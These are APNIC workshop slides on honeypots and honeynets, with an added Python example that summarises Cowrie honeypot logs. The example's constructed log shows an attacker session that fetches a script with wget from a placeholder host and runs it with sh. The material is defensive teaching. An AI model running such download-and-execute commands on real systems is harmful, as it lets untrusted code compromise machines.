honeypots & honeynets - wiki.apnictraining.net
Honeypots & Honeynets
Network Security Workshop
Issue Date: 30 May 2015
Revision: 2.0-draft
Contents
1. Objectives
2. Definition of Honeypot & Honeynets
3. Benefits & Risk consideration
4. Example of Honeypot tools
5. The Honeynet Project
Credits: David Watson (Honeynet Project) for some of the contents of these slides ([email protected])
Know Your Enemy
(Mission Statement, The Honeynet Project)
These days you may be familiar with the term ‘Threat Intelligence’
To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned
Honeypots in a Nutshell
• Resources (vulnerable) deployed to
– Learn about attacks and attackers’ methodology
– Understand how systems are compromised
– Uncover the attacker’s infrastructure (compromised hosts, networks, C&C servers)
– Capture relevant artifacts – pcaps, malware samples, etc.
• Could even show vulnerabilities not yet known!
• Lots of open source tools and projects
• Nothing to do with bees or honey ☺
The Big Picture
[Diagram: Attacking Host [IP Address] → Honeypot → Pastebin]
• Attacking host – bruteforce and gain access
• Downloads malicious script
• Executes malicious script
– Honeypot won’t execute the script, but we have a copy of the malware sample
• What is the malware doing?
Honeypots and Honeynets
• A honeypot is an information system resource whose value lies in the unauthorized or illicit use of that resource
• Honeypot systems have no production value, so any activity going to or from a honeypot is likely a probe, attack or compromise
• A honeynet is simply a network of honeypots
• Information gathering and early warning are the primary benefits to most organisations
Honeypot and Honeynet Types
• Low-Interaction (LI)
– Emulates services, applications and OS’s
– Easier to deploy/maintain, low risk, but only limited information
• High-Interaction (HI)
– Real services, applications and OS’s
– Capture extensive information, but higher risk and time intensive to maintain
Honeypot and Honeynet Types
• Server Honeypots
– Listen for incoming network connections
– Analyse attacks targeting host’s users, services and operating systems
• Client Honeypots
– Reach out and interact with remote potentially malicious resources
– Have to be instructed where to go to find evil
– Analyse attacks targeting clients and users
Honeypot and Honeynet Pros / Cons
Pros
• Simple Concept
• Collect small data sets of high value
• Few False Positives
• Catch new attacks
• Low False Negatives
• Can beat encryption
• Minimal hardware
• Real time alerting
Cons
• Potentially complex
• Need data analysis
• Only a microscope
• Detection by attackers
• Risk from compromises
• Legal concerns
• False negatives
• Potentially live 24/7
• Operationally intensive
APNIC46
• APNIC46 Network Security Workshop participants deployed 7 honeypots to a cloud service
What can you learn?
• Hosts that are trying to connect to / scan you
– Potentially already compromised or infected
– Such as IP address
• The payload used after successfully gaining access to the honeypot system
• Scripts, binaries/executables etc.
– Remote control scripts
– Malware samples
Why would you want to do this?
• By right, you should not expect any real activity or traffic to/from/in your honeypot
• Detect anomalous activities in your network or system
– Infected / compromised computers
– Misconfiguration
• Learn about attacks in the wild (research)
– Especially if you can scale the deployment
– Attackers and attacker techniques
– Information sharing opportunities
– Improve overall security
Some Examples
• Dionaea (Malware): http://dionaea.carnivore.it/
• Cowrie – SSH & Telnet honeypot: https://github.com/cowrie/cowrie/
• Kippo – SSH honeypot: https://code.google.com/p/kippo/
• Glastopf – Web honeypot: http://glastopf.org/
• Ghost – USB honeypot: https://code.google.com/p/ghost-usb-honeypot/
• Thug – Client honeypot: https://github.com/buffer/thug
APNIC Community Honeynet Project
• Started in 2015
• Distributed Honeypots*
• Partners mainly in the AP region
• Observe and learn about attacks on the Internet
• Information sharing with APNIC members, CERTs/CSIRTs and Security Community
Learn from actual compromise
• Honeypot used – Cowrie
• Emulate login on port 22 (ssh) and port 23 (telnet)
• Present attacker with file system
• Capture commands and allow attacker to download scripts/binaries (payload)
• Demo: https://www.fsck.my/viz/kippo-playlog.php
– Check out #2 (manual attack) and #19 (automated attack)
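As an added example (not part of the original slides, and not Cowrie's own code), the following Python turns Cowrie-style JSON log lines into the per-session picture the slides describe: which hosts tried credentials, which actually got in, what commands they ran, and the hash of any payload they fetched. The event and field names are assumed to follow Cowrie's JSON log format; the log lines, addresses and hash value are constructed for the example.

```python
import json
from collections import defaultdict

# Constructed sample of Cowrie-style JSON log lines (not real captured data);
# event/field names are assumed to match Cowrie's cowrie.json output.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","username":"root","password":"123456","session":"a1","src_ip":"198.51.100.23","timestamp":"2015-05-30T01:00:01Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","session":"a1","src_ip":"198.51.100.23","timestamp":"2015-05-30T01:00:02Z"}
{"eventid":"cowrie.command.input","input":"wget http://203.0.113.9/x.sh","session":"a1","src_ip":"198.51.100.23","timestamp":"2015-05-30T01:00:03Z"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.9/x.sh","shasum":"CONSTRUCTED_SHA256_1","outfile":"dl/CONSTRUCTED_SHA256_1","session":"a1","src_ip":"198.51.100.23","timestamp":"2015-05-30T01:00:04Z"}
{"eventid":"cowrie.command.input","input":"sh x.sh","session":"a1","src_ip":"198.51.100.23","timestamp":"2015-05-30T01:00:05Z"}
{"eventid":"cowrie.session.closed","session":"a1","src_ip":"198.51.100.23","timestamp":"2015-05-30T01:00:06Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","session":"b2","src_ip":"192.0.2.77","timestamp":"2015-05-30T01:10:01Z"}
{"eventid":"cowrie.session.closed","session":"b2","src_ip":"192.0.2.77","timestamp":"2015-05-30T01:10:02Z"}
"""

def parse_sessions(log_text):
    """Group events by Cowrie session id: logins tried, commands typed, files fetched."""
    sessions = defaultdict(lambda: {"src_ip": None, "logins": [], "commands": [], "downloads": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev["eventid"]
        if eid in ("cowrie.login.success", "cowrie.login.failed"):
            s["logins"].append((ev["username"], ev["password"], eid.endswith("success")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev["url"], ev["shasum"]))
    return dict(sessions)

def summarise(sessions):
    """One row per session: did the attacker get in, what did it run, what did it fetch."""
    rows = []
    for sid, s in sessions.items():
        rows.append({
            "session": sid, "src_ip": s["src_ip"],
            "compromised": any(ok for _, _, ok in s["logins"]),
            "creds_tried": len(s["logins"]),
            "commands": s["commands"],
            "samples": sorted({sha for _, sha in s["downloads"]}),  # payload hashes to analyse
        })
    return rows

if __name__ == "__main__":
    for row in summarise(parse_sessions(SAMPLE_LOG)):
        print(row)
```

The `samples` hashes point at the files Cowrie kept instead of executing, which is where the "what is the malware doing?" analysis starts.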
Sensor locations
• Tonga
• Samoa
• Malaysia
• Bhutan
• Bangladesh
• Japan
• Australia
Conclusion
• Honeypots are useful for learning about attacks (early warning or research)
• APNIC Community Project
– Looking for partners to deploy honeypots
– Collaboration
Contact: [email protected]